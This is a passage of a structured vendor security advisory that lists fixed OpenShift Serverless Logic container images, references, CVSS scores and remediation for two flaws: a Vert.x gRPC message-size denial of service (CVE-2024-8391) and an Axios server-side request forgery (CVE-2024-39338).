"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, ], }, vulnerabilities: [ { cve: "CVE-2024-8391", cwe: { id: "CWE-770", name: "Allocation of Resources Without Limits or Throttling", }, discovery_date: "2024-09-04T16:20:44.762419+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2309758", }, ], notes: [ { category: "description", text: "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-8391", }, { category: "external", summary: "RHBZ#2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-8391", url: "https://www.cve.org/CVERecord?id=CVE-2024-8391", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", }, { category: "external", summary: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", url: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", }, { category: "external", summary: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", url: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", }, ], release_date: "2024-09-04T16:15:09.253000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: 